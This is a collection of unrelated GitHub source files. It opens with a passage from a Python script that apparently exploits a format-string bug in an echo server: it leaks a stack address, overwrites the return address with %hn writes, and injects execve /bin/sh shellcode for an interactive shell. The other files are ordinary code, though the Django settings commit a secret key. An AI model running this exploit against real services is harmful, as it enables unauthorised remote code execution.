sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if len(sys.argv) < 3:
    print "Please provide <hostname> <port number>"
    exit(1)
# Connect the socket to the port on the server given by the caller
# server_address = (sys.argv[1], sys.argv[2]) # socket id
print "connecting to " + sys.argv[1] + " port " + sys.argv[2]
sock.connect((sys.argv[1], int(sys.argv[2]))) # connect to socket
tn = telnetlib.Telnet()
tn.sock = sock
# try:
data = sock.recv(1024)
print data.decode() # 200 OK ECHO (v0.2)
# while True:
#     string = raw_input()
#     string = string +'\n'
#     print "Sending: %s" % string
#     sock.sendall(string) # send string
#     print "String sent!"
# Leak the buffer's stack address: %1$p echoes back the first vararg pointer.
pload1 = '%1$p\n'
print "Sending: %s" % pload1
sock.send(pload1) # send string
# print "String sent!"
time.sleep(1)
data = sock.recv(1024)
print "Buffer start: " + data.decode()
# Calculate new return address
# NOTE(review): the reply is parsed as hex, so the server is assumed to
# answer with a literal "0x..." pointer string.
return_addr = int(data, 16)
return_addr = return_addr + 97 # updated with odd address offset
return_addr = hex(return_addr)
return_addr = str(return_addr)
print "Return addr to place: " + return_addr
# List of converted hex values to decimal
dec_addr_list = []
address_end = return_addr[-4:]
# print "Address end: " + address_end
dec_addr_end = int(address_end, 16)
# print "Dec conversion is: " + str(dec_addr_end)
address_mid = return_addr[6:10]
# print "Address middle: " + address_mid
dec_addr_mid = int(address_mid, 16)
# print "Dec conversion is: " + str(dec_addr_mid)
address_beg = return_addr[2:6]
# print "Address beginning: " + address_beg
dec_addr_beg = int(address_beg, 16)
# print "Dec conversion is: " + str(dec_addr_beg)
# sort address values by size
# The second tuple element (13/14/15) is the printf argument index used for
# the corresponding %hn write in the payload below.
dec_addr_list.append((dec_addr_beg, 13))
dec_addr_list.append((dec_addr_mid, 14))
dec_addr_list.append((dec_addr_end, 15))
# print "Dec addr list: "
# print dec_addr_list
dec_addr_list.sort(key=lambda tup: tup[0])
# print "Sorted dec addr list: "
# print dec_addr_list
# Calculate size differences of values
# %hn writes must happen in increasing value order; store each value as the
# increment over the previous one so %c padding counts stay non-negative.
updated_addr_list = []
updated_addr_list.append(dec_addr_list[0])
updated_addr_list.append((dec_addr_list[1][0] - dec_addr_list[0][0], dec_addr_list[1][1]))
updated_addr_list.append((dec_addr_list[2][0] - dec_addr_list[1][0], dec_addr_list[2][1]))
print "Updated addr list: "
print updated_addr_list
# Calculate location to place return address
return_placement = int(data, 16)
print_addr1 = return_placement + 284
print_addr1 = hex(print_addr1)
print_addr1 = str(print_addr1)
print "Place return address here: " + print_addr1
# print "Length: " + str(len(print_addr1))
# print "Convert this: " + print_addr1[2:]
# Zero fill addresses to 8 bytes
if len(print_addr1) < 18:
    print_addr1 = print_addr1[:2] + "0"*(18-len(print_addr1)) + print_addr1[2:]
# Reverse the byte pairs: convert the address to little-endian byte order.
print_addr1 = print_addr1[:2]+print_addr1[16:]+print_addr1[14:16]+print_addr1[12:14]+print_addr1[10:12]+print_addr1[8:10]+print_addr1[6:8]+print_addr1[4:6]+print_addr1[2:4]
# print "...New: " + print_addr1
ASCIIaddr1 = bytearray.fromhex(print_addr1[2:])
# return_placement = int(data, 16)
print_addr2 = return_placement + 282
print_addr2 = hex(print_addr2)
print_addr2 = str(print_addr2)
# print "...here: " + print_addr2
if len(print_addr2) < 18:
    print_addr2 = print_addr2[:2] + "0"*(18-len(print_addr2)) + print_addr2[2:]
print_addr2 = print_addr2[:2]+print_addr2[16:]+print_addr2[14:16]+print_addr2[12:14]+print_addr2[10:12]+print_addr2[8:10]+print_addr2[6:8]+print_addr2[4:6]+print_addr2[2:4]
# print "...New: " + print_addr2
ASCIIaddr2 = bytearray.fromhex(print_addr2[2:])
# return_placement = int(data, 16)
print_addr3 = return_placement + 280
print_addr3 = hex(print_addr3)
print_addr3 = str(print_addr3)
# print "...and here: " + print_addr3
if len(print_addr3) < 18:
    print_addr3 = print_addr3[:2] + "0"*(18-len(print_addr3)) + print_addr3[2:]
print_addr3 = print_addr3[:2]+print_addr3[16:]+print_addr3[14:16]+print_addr3[12:14]+print_addr3[10:12]+print_addr3[8:10]+print_addr3[6:8]+print_addr3[4:6]+print_addr3[2:4]
# print "...New: " + print_addr3
ASCIIaddr3 = bytearray.fromhex(print_addr3[2:])
# Shellcode source:
# ;Category: Shellcode
# ;Title: GNU/Linux x86_64 - execve /bin/sh
# ;Author: m4n3dw0lf
# ;Github: https://github.com/m4n3dw0lf
# ;Date: 14/06/2017
# ;Architecture: Linux x86_64
# https://www.exploit-db.com/exploits/42179/
# starting with example for buffer start at 0x7fffffffec50
# Payload layout: three "%<pad>c%<idx>$hn" half-word writes, the three
# little-endian target addresses, a 64-byte NOP sled, then the shellcode.
payload = "%" + str(updated_addr_list[0][0]).zfill(5) + "c%" + str(updated_addr_list[0][1]) \
    + "$hn%" + str(updated_addr_list[1][0]).zfill(5) + "c%" + str(updated_addr_list[1][1]) + \
    "$hn%" + str(updated_addr_list[2][0]).zfill(5) + "c%" + str(updated_addr_list[2][1]) + "$hn" \
    + "A" + str(ASCIIaddr1) + str(ASCIIaddr2) + str(ASCIIaddr3) + "\x90"*64 + \
    "\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05\n"
print payload
# string = raw_input()
# string = string +'\n'
# # print "Sending: %s" % string
# sock.sendall(string) # send string
# # print "String sent!"
# data = sock.recv(1024)
# print data.decode()
# # print "Response: %s" % data.decode() # receive response
sock.send(payload)
time.sleep(1)
sock.send("quit\n")
# data = sock.recv(1024)
# print data.decode()
# time.sleep(1)
# Hand the socket over to an interactive telnet session (the spawned shell).
tn.interact()
| [
"noreply@github.com"
] | ryandsowers.noreply@github.com |
5f0d17422cc3b27b56b10e55530f53bf4a807cd8 | 5ec39b8559af4d88b1c3d9a7bd1eacd3d2ac63d3 | /Problem32.py | 4655e406865a6f826733e49062eb6b1204c059d8 | [] | no_license | vinxavier/metodosdeotimizacao | 71e8247e77ebd61b54a7f03233ab6ddf6a42e1cf | 9b827b567bea9f2005770e399061b4abb0ec3bf3 | refs/heads/master | 2020-06-14T18:22:30.684738 | 2019-08-26T21:08:12 | 2019-08-26T21:08:12 | 195,085,340 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,023 | py | from ortools.linear_solver import pywraplp
# Fleet-purchase optimisation (CBC mixed-integer program): choose how many of
# each of six vehicle models to buy, maximising passenger capacity subject to
# budget, maintenance and fleet-composition constraints.
MAX_CUSTO = 250000       # total purchase budget
MAX_MANUTENCAO = 50000   # total maintenance budget
MAX_VEICULOS = 8         # maximum fleet size
custos = [26000, 30000, 24000, 32000, 50000, 60000]
capacidade = [7,8,9,11,20,24]
manutencao = [5000, 3500, 6000, 8000, 7000, 110000]
labels = ["Nissan Van", "Toyota Van", "Plymouth Van", "Ford(Stretch) Van",
"Mitsubishi Minibus","General Motors Minibus"]
p = pywraplp.Solver("", pywraplp.Solver.CBC_MIXED_INTEGER_PROGRAMMING)
infinity = p.infinity()
# One non-negative integer variable per model: number of vehicles purchased.
x = [p.IntVar(0, infinity, labels[i]) for i in range(6)]
p.Add(p.Sum([x[i]*custos[i] for i in range(6)])<=MAX_CUSTO)
p.Add(p.Sum([x[i]*manutencao[i] for i in range(6)])<=MAX_MANUTENCAO)
p.Add(p.Sum([x[i] for i in range(6)])<=MAX_VEICULOS)
p.Add(x[4]+x[5]>=1)  # at least one minibus (indices 4-5 per labels)
p.Add(x[0]+x[1]+x[2]+x[3]>=3)  # at least three vans (indices 0-3)
# At least half the fleet must come from models 2, 3 and 5.
p.Add(x[2]+x[3]+x[5] - 0.5 * p.Sum([x[i] for i in range(6)])>=0)
p.Maximize(p.Sum([x[i]*capacidade[i] for i in range(6)]))
p.Solve()
for i in range(6):
    print("Número de ", x[i]," = ",x[i].solution_value())
print("Total de assentos:", p.Objective().Value())
| [
"vsxavier@live.com"
] | vsxavier@live.com |
015fd34248887879e5b092b00ab71bd4a61b4d02 | 8a9ba5e9e8c9f3d8e05b6840f1c17d526344e6d2 | /src/reia.py | 7ada168207031f9a5c85d73b90325662fbde0a50 | [
"MIT"
] | permissive | maanavshah/remote-intelligent-assistant | fe1e2bcb6d43345553194c442d4676b3137e0348 | 65ea7287d0ca2dd98a376bbadc81a5093b9b6046 | refs/heads/master | 2021-06-13T20:20:05.622634 | 2019-12-20T12:54:00 | 2019-12-20T12:54:00 | 142,580,543 | 4 | 0 | MIT | 2021-03-25T21:58:30 | 2018-07-27T13:27:56 | Python | UTF-8 | Python | false | false | 5,369 | py | import yaml
import sys
import random
import nltk
import operator
import jellyfish as jf
import json
import requests
import os
import time
import signal
import subprocess
from nltk.tag import StanfordPOSTagger
from textblob.classifiers import NaiveBayesClassifier
from execute import construct_command
from feedback import get_user_feedback
import numpy as np
from sklearn.pipeline import Pipeline
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.svm import LinearSVC
from sklearn.feature_extraction.text import TfidfTransformer
from sklearn.multiclass import OneVsRestClassifier
from sklearn import preprocessing
def signal_handler(signal, frame):
    """SIGINT (Ctrl-C) handler: print a goodbye message and exit cleanly.

    NOTE(review): the first parameter shadows the imported ``signal`` module
    inside this function; harmless here, but worth renaming to ``signum``.
    """
    print ('Thank You!')
    sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
# Resolve config/data paths relative to this source file's directory.
my_path = os.path.abspath(os.path.dirname(__file__))
CONFIG_PATH = os.path.join(my_path, "../config/config.yml")
MAPPING_PATH = os.path.join(my_path, "../data/mapping.json")
TRAINDATA_PATH = os.path.join(my_path, "../data/traindata.txt")
LABEL_PATH = os.path.join(my_path, "../data/")
# Make ../data importable so trainlabel.py can be loaded as a module.
sys.path.insert(0, LABEL_PATH)
import trainlabel
with open(CONFIG_PATH,"r") as config_file:
    config = yaml.load(config_file)
# NOTE(review): yaml.load without an explicit Loader can execute arbitrary
# tags; prefer yaml.safe_load for plain configuration data.
os.environ['STANFORD_MODELS'] = config['tagger']['path_to_models']
exec_command = config['preferences']['execute']
def get_username(user_id):
    """Resolve a Slack user id to its account name via the configured
    user-info endpoint."""
    payload = {'token': config['slack']['slack_token'], 'user': user_id}
    r = requests.post(config['slack']['user_info'], params=payload)
    return r.json()['user']['name']
def read_message():
    """Fetch the most recent message from the configured Slack channel.

    Returns:
        (message_text, timestamp, user): user is the 'user' id when present,
        otherwise the bot 'username' field.

    NOTE(review): r.json() is re-parsed on every access; caching it once
    would avoid repeated parsing of the same response body.
    """
    payload = {'token': config['slack']['slack_token'], 'channel': config['slack']['channel'] , 'count': '1'}
    r = requests.get(config['slack']['get_url'], params=payload)
    message = r.json()['messages'][0]['text']
    ts = r.json()['messages'][0]['ts']
    data = r.json()['messages'][0]
    if 'user' not in data:
        user = r.json()['messages'][0]['username']
    else:
        user = r.json()['messages'][0]['user']
    return(message,ts,user)
def post_message(message):
    """Post *message* to the configured Slack channel; return the response."""
    payload = {'token': config['slack']['slack_token'], 'channel': config['slack']['channel'] , 'text': message, 'username':config['slack']['username']}
    r = requests.post(config['slack']['post_url'], params=payload)
    return r
def classify(text):
    """Classify *text* into one of the command categories.

    Trains a one-vs-rest linear SVM over a bag-of-words/tf-idf pipeline on
    the labelled sentences in TRAINDATA_PATH, then predicts the label set
    for *text*.

    Returns:
        str: comma-joined predicted labels, or "" when no label matched.

    NOTE(review): the model is re-trained from disk on every call; caching
    the fitted pipeline would avoid that cost if this becomes a bottleneck.
    """
    # Use a context manager so the training-data file handle is closed
    # (the original left it open).
    with open(TRAINDATA_PATH) as train_file:
        X_train = np.array([line.rstrip('\n') for line in train_file])
    y_train_text = trainlabel.y_train_text
    X_test = np.array([text])
    # Binarize the label sets so each category becomes one output column.
    lb = preprocessing.MultiLabelBinarizer()
    Y = lb.fit_transform(y_train_text)
    classifier = Pipeline([
        ('vectorizer', CountVectorizer()),
        ('tfidf', TfidfTransformer()),
        ('clf', OneVsRestClassifier(LinearSVC()))])
    classifier.fit(X_train, Y)
    predicted = classifier.predict(X_test)
    all_labels = lb.inverse_transform(predicted)
    # X_test holds exactly one sample, so this returns on the first pair.
    for item, labels in zip(X_test, all_labels):
        return (', '.join(labels))
def suggestions(suggest_list):
    """Return the five highest-scoring (score, phrase) pairs, best first."""
    ranked = sorted(suggest_list, reverse=True)
    return ranked[:5]
def consume_message():
    """Remove the first line of the message-queue file (the message just handled).

    NOTE(review): the queue path is hard-coded and the command runs via
    shell=True; the string is fixed so there is no injection risk, but
    rewriting the file in Python would be more portable than sed.
    """
    cmd = "sed -i -e \"1d\" /home/maanav/REIA/mqueue.txt"
    proc = subprocess.Popen([cmd], stdout=subprocess.PIPE, shell=True)
    (out, err) = proc.communicate()
def call_reia():
    """Main service loop: pop one queued Slack message ("<user_id> <text>"
    per line), classify it, fuzzy-match it to a known command phrase and
    dispatch it for execution."""
    while(True):
        max_score = 0.1
        map_val = ""
        with open('/home/maanav/REIA/mqueue.txt', 'r') as f:
            first_line = f.readline()
        # NOTE(review): this recurses instead of re-reading while the queue
        # is empty, so long idle periods grow the call stack without bound.
        while first_line == "":
            time.sleep(1)
            call_reia()
        print('-----------------------')
        user_input = first_line.split(' ', 1)[1]
        user_name = get_username(first_line.split(' ', 1)[0])
        suggest_list = []
        suggest_message = ""
        #prev_ts = ts
        print("\nINPUT = ")
        print(user_input)
        label = classify(user_input)
        # No category predicted: log the miss and drop the message.
        if label == "":
            # post_message("Sorry, I could not understand. Please rephrase and try again.")
            with open("/home/maanav/REIA/src/user.txt", "a") as output_file:
                output_file.write("Incorrectly mapped ::User-Input = " + user_input)
            consume_message()
            continue
        print("Classified as : "+str(label))
        tokens = nltk.word_tokenize(user_input)
        print(tokens)
        st = StanfordPOSTagger(config['tagger']['model'],path_to_jar=config['tagger']['path'])
        stanford_tag = st.tag(user_input.split())
        print("Tags")
        print(stanford_tag)
        with open(MAPPING_PATH,'r') as data_file:
            data = json.load(data_file)
        # Pick the known phrase with the highest Jaro similarity to the input.
        for i in data[label]:
            dist = jf.jaro_distance(str(user_input),str(i))
            suggest_list.append(tuple((dist,i)))
            print(dist)
            if(dist > max_score):
                max_score = dist
                map_val = i
        # Below the similarity threshold: log the miss and drop the message.
        if max_score < config['preferences']['similarity_threshold']:
            # post_message("Sorry, I could not understand. Please rephrase and try again.")
            with open("/home/maanav/REIA/src/user.txt", "a") as output_file:
                output_file.write("Incorrectly mapped ::User-Input = " + user_input)
            consume_message()
            continue
        # Suggestions mode: reply with the top candidate phrases instead of
        # executing anything. NOTE(review): the message is never consumed on
        # this path, so the same queue entry is processed again.
        if config['preferences']['suggestions'] == True:
            suggest = suggestions(suggest_list)
            post_message("Did you mean :")
            for i in suggest:
                suggest_message += (str(i[1])+"\n")
            post_message(suggest_message)
            continue
        print("\nMapped to : "+map_val)
        with open("/home/maanav/REIA/src/user.txt", "a") as output_file:
            output_file.write("correctly mapped to : " + map_val + " User-Input = " + user_input)
        #post_message(map_val)
        construct_command(user_input,label,tokens,map_val,stanford_tag,exec_command,user_name)
        #call('sed -i -e "1d " REIA/mqueue.txt')
        consume_message()
        #print(response)
# Start the long-running message-processing loop.
print("Starting...")
call_reia()
| [
"shah.maanav.07@gmail.com"
] | shah.maanav.07@gmail.com |
13c40060e5b65b6df1506e61896e3e1f011a39ea | 25a6d71c25c1c808a72f484bf568d41c1d455b2f | /Program13.py | 5d2594b3ae28011ec74a3d5d9c9cab8e57df2261 | [] | no_license | DreamITJob/Top-35-Medium-Level-Python-programs | 4045a8feeb30c56c142cf5b629b23e1a7671e8d3 | ca91a82d901b218fb359875affb74fe6c0c5b734 | refs/heads/master | 2020-06-02T08:33:10.590476 | 2019-07-12T13:10:36 | 2019-07-12T13:10:36 | 191,100,930 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 719 | py | #Python program for swapping of variables...
def swap1(x, y):
    """Swap two values via tuple unpacking and print the swapped pair."""
    print("1st swap function: ")
    y, x = x, y
    print("first number: ", x)
    print("second number: ", y)
def swap2(x, y):
    """Swap two numbers arithmetically (no temporary) and print them."""
    print("2nd swap function: ")
    total = x + y
    y = total - y  # y becomes the original x
    x = total - x  # x becomes the original y
    print("first number: ", x)
    print("second number: ", y)
def swap3(x, y):
    """Swap two integers with XOR operations and print them."""
    print("3rd swap function: ")
    x ^= y
    y ^= x
    x ^= y
    print("first number: ", x)
    print("second number: ", y)
def swap4(x, y):
    """Swap two non-zero numbers via multiply/floor-divide and print them."""
    print("4th swap function: ")
    product = x * y
    y = product // y  # y becomes the original x
    x = product // x  # x becomes the original y
    print("first number: ", x)
    print("second number: ", y)
# Interactive driver: read two integers, then demonstrate all four swaps.
x=int(input("Enter first number: "))
y= int(input("Enter second number : "))
swap1(x,y)
swap2(x,y)
swap3(x,y)
swap4(x,y)
| [
"noreply@github.com"
] | DreamITJob.noreply@github.com |
18071d30d283c766360748f5352421075c2b4206 | 128a0343dc88700eb3243a1e7138416a18b9c4a3 | /financialTrack/financialTrack/wsgi.py | 10b754ac005a93a1f18e5b30f9e2233fe6709c7a | [] | no_license | wandss/personalFinances | d9d5a13ac3ccb30de0809bdb3f933552d191bcfc | 7297cccdcc4b83df03f7379bd3b6de2047ed3dd6 | refs/heads/master | 2022-12-12T21:53:26.691181 | 2019-02-12T00:57:51 | 2019-02-12T00:57:51 | 98,544,121 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 405 | py | """
WSGI config for financialTrack project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
# Point Django at the project settings before building the WSGI callable.
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "financialTrack.settings")
application = get_wsgi_application()
| [
"wandss@gmail.com"
] | wandss@gmail.com |
e31667b4ec577f4cfd9f836a00c3146187cb1e51 | 287527cf1f9ffbca9016dc558e64392a9db4ed63 | /nginx/molecule/default/tests/test_default.py | 9d399b74550875e59b2ed49ccfe85dc1abd239c0 | [
"MIT"
] | permissive | midacts/ansibe-molecule-nginx | d8564f9220aa5bb1ba2b35c38e6b4c04e03bd84c | f002d8b2cbc9111367a9cfa6c3dc6099c6d75d41 | refs/heads/master | 2020-04-25T07:42:47.263893 | 2019-02-26T03:06:17 | 2019-02-26T03:06:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 554 | py | import os
import testinfra.utils.ansible_runner
testinfra_hosts = testinfra.utils.ansible_runner.AnsibleRunner(
os.environ['MOLECULE_INVENTORY_FILE']).get_hosts('all')
def test_hosts_file(host):
    """/etc/hosts must exist and be owned by root:root."""
    f = host.file('/etc/hosts')
    assert f.exists
    assert f.user == 'root'
    assert f.group == 'root'
def test_nginx_is_installed(host):
    """The nginx package must be installed on the target host."""
    assert host.package('nginx').is_installed
def test_nginx_is_running(host):
    """The nginx service must be running."""
    assert host.service('nginx').is_running
def test_nginx_is_enabled(host):
    """The nginx service must be enabled at boot."""
    assert host.service('nginx').is_enabled
| [
"midactsmystery@gmail.com"
] | midactsmystery@gmail.com |
5b12aa37e4fb1e02bcac1201734492cfd9237ee3 | 4774757f23003c42e1a233c9b01769e30c5a5d13 | /mysite/blog/templatetags/blog_tags.py | 9b8fcc32759de85b4ff83e2db6866cf057205bd9 | [
"MIT"
] | permissive | kformanowicz/django-blog | c1f452e5f8b451af9383d7d18443c0427d88c866 | 1cc2cbf9b3bb5dc797f94e84227ef64457ff2d95 | refs/heads/master | 2020-03-16T12:18:38.425931 | 2018-09-02T18:25:54 | 2018-09-02T18:25:54 | 132,663,909 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 727 | py | from django import template
from django.db.models import Count
from django.utils.safestring import mark_safe
from ..models import Post
import markdown
register = template.Library()
@register.simple_tag
def total_posts():
    """Template tag: return the number of published posts."""
    return Post.published.count()
@register.inclusion_tag('blog/post/latest_posts.html')
def show_latest_posts(count=5):
    """Inclusion tag: render the *count* most recently published posts."""
    latest_posts = Post.published.order_by('-publish')[:count]
    return {'latest_posts': latest_posts}
@register.simple_tag
def get_most_commented_posts(count=5):
    """Template tag: return the *count* published posts with most comments."""
    return Post.published.annotate(total_comments=Count('comments')).order_by('-total_comments')[:count]
@register.filter(name='markdown')
def markdown_format(text):
    """Filter: render *text* as Markdown and mark the HTML safe.

    NOTE(review): mark_safe on rendered markdown allows raw HTML through;
    only safe if the post body is trusted (author-supplied) content.
    """
    return mark_safe(markdown.markdown(text))
| [
"formanowicz.k@gmail.com"
] | formanowicz.k@gmail.com |
e3445c3b28ca5e82a27ac440ccba698b69daf57d | 0e2716fa989661ec03dd817bf47f33eb9c6c1011 | /normalize.py | 264e1c38edf7f9a3f1eb616cc37f67788de1f478 | [] | no_license | lpbirdueng/myApps | 27222faa3b538bc4e5fef3a03e03d1fc037808f8 | 63c608a8d9125a3f5587dd5c885207a1df31671f | refs/heads/master | 2021-01-19T10:52:00.437327 | 2017-05-17T09:05:24 | 2017-05-17T09:05:24 | 87,903,972 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 162 | py |
def normalize(name):
    """Return *name* with its first letter upper-cased, the rest lower-cased.

    Uses slicing (name[:1]) instead of name[0] so an empty string is
    returned unchanged rather than raising IndexError.
    """
    norm_words = name[:1].upper() + name[1:].lower()
    return norm_words
L1 = ['adam','LiSA','barT']
L2 = list(map(normalize,L1))
print(L2)
"lupeng0924@sina.com"
] | lupeng0924@sina.com |
3b4a2003180e91fe0fb07b7bdd754aecae30eddf | a1f36fe7872dc5e878d0fbc62043bb9db3e51acd | /mysite/settings.py | dd722fdf87cc09280600c5e1c9cf35de492fdb88 | [] | no_license | SusanaLJ/my-blog | 66e29c3041e46bcf08f6d57c2f6f664efef221de | 2bfc41bdcc0996d989f18c3cf78a4eb0df818ea1 | refs/heads/master | 2020-03-30T23:13:18.183845 | 2018-10-05T14:48:37 | 2018-10-05T14:48:37 | 151,694,231 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,217 | py | """
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 2.0.9.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to version control — rotate it and
# load it from the environment before any production deployment.
SECRET_KEY = '$eo@l2+z(h)m7-lvt_mn^&d+vgtb4)ny*$!0#jdo-3%h%)0hf-'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['127.0.0.1', '.pythonanywhere.com']
# Application definition
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'blog',  # project blog application
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Europe/Berlin'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
# STATIC_URL was previously assigned twice with the same value; keep a
# single definition grouped with the other static-file settings.
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
| [
"susanaledesmajimenez@gmail.com"
] | susanaledesmajimenez@gmail.com |
34a34b155ceef0b935c8c7b9fdbf54c84090c897 | 3d1fbb75a58db3eaa7a80e62ae75abf65a00a5cf | /exercices/w1/LA/orthogonal.test.py | 668c69e699e3ecc2d121e00c0d3b3f222c120790 | [] | no_license | opatiny/mobile-robotics | ff3051e1ae3272a58689fcafd136a722009536a6 | d59256a996d5772393c903c94c8e9c86cb945d60 | refs/heads/master | 2020-06-17T19:07:59.380226 | 2019-11-06T09:00:59 | 2019-11-06T09:00:59 | 196,018,976 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 393 | py | from orthogonal import isOrthogonal
matrix = [[1, 0], [0, 1]]
print("matrix")
isOrthogonal(matrix)
matrix1 = [[1, 2], [3, 4, 5]]
print("matrix1")
isOrthogonal(matrix1)
matrix2 = [[2/3, 1/3, 2/3], [-2/3, 2/3, 1/3], [1/3, 2/3, -2/3]]
print("matrix2")
isOrthogonal(matrix2)
matrix3 = [[2/3, 2/3, -1/3], [2/3, -1/3, 2/3], [-1/3, 2/3, 2/3]]
print("Exercise matrix: ")
isOrthogonal(matrix3)
| [
"oceane@octanis.ch"
] | oceane@octanis.ch |
9df0e4404a0a011ce5e1618eaf2bf3b31c0ad708 | 937d0b86d5a438338cbc5d4938c9109e9b0a51c4 | /web/project6/phonenet/phoneapp/migrations/0004_tool_toolimg.py | b53e7d1b24d4f7522331050332b0272f77f7ae46 | [] | no_license | z1459876808/web- | 40ebb1bca626f0ff3f81a19aa21baf3c378c46da | f42ce9f4b568da00ea815b1bc724d09f9e6c567c | refs/heads/master | 2022-11-21T23:30:06.069107 | 2020-07-20T03:49:49 | 2020-07-20T03:55:38 | 281,004,028 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,043 | py | # Generated by Django 3.0.4 on 2020-03-11 02:45
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated migration: creates the Tool and Toolimg tables."""
    dependencies = [
        ('phoneapp', '0003_label'),
    ]
    operations = [
        migrations.CreateModel(
            name='Tool',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=10)),
            ],
        ),
        migrations.CreateModel(
            name='Toolimg',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=10)),
                ('img', models.ImageField(upload_to='toolimg')),
                # verbose_name below is Chinese for "parent title".
                ('title', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='toolimg', to='phoneapp.Tool', verbose_name='所属标题')),
            ],
        ),
    ]
| [
"1459876808@qq.com"
] | 1459876808@qq.com |
3a068e2a6864d85f641af5e0ebd662ca44331292 | 07a1088bcec25cdf7e4027abc5a8dc83eb37ffb4 | /fabrik/ext/nginx.py | ccc6e5e8f0774d418cd35226796dadcf056ebc96 | [
"MIT"
] | permissive | Frojd/Fabrik | 7e00bb66761c552da9d70cc36f3ff0108bf7a481 | 9f2edbba97a7fd236b72a9b3010f6e912ab5c001 | refs/heads/master | 2020-04-06T04:39:31.445843 | 2018-04-16T06:54:21 | 2018-04-16T06:54:21 | 25,035,502 | 12 | 0 | null | null | null | null | UTF-8 | Python | false | false | 231 | py | # -*- coding: utf-8 -*-
"""
fabrik.ext.nginx
----------------------
Methods for handling nginx
"""
from fabric.state import env
def restart():
env.run("service nginx restart")
def reload():
env.run("nginx -s reload")
| [
"martin@marteinn.se"
] | martin@marteinn.se |
1c89e34f2a701a441c1be1d145087c705e02ff86 | f2171e2f2c78d616a381b3308d13a600d687587f | /x.Machine Learning Foundation/NumPy and Pandas Part 1/numpy_index_array.py | fce265f622df7db4d6f5e57be7428a2167fd3916 | [] | no_license | vinkrish/ml-jupyter-notebook | bda01343118869bd2bfb44f3c3122853834d314a | ef5d05512b8387d7a3e494f024416f6ca7336827 | refs/heads/master | 2021-06-09T00:53:51.638551 | 2021-05-08T15:13:51 | 2021-05-08T15:13:51 | 168,104,038 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,921 | py | import numpy as np
# Change False to True for each block of code to see what it does
# Using index arrays
if False:
a = np.array([1, 2, 3, 4])
b = np.array([True, True, False, False])
print a[b]
print a[np.array([True, False, True, False])]
# Creating the index array using vectorized operations
if False:
a = np.array([1, 2, 3, 2, 1])
b = (a >= 2)
print a[b]
print a[a >= 2]
# Creating the index array using vectorized operations on another array
if False:
a = np.array([1, 2, 3, 4, 5])
b = np.array([1, 2, 3, 2, 1])
print b == 2
print a[b == 2]
def mean_time_for_paid_students(time_spent, days_to_cancel):
'''
Fill in this function to calculate the mean time spent in the classroom
for students who stayed enrolled at least (greater than or equal to) 7 days.
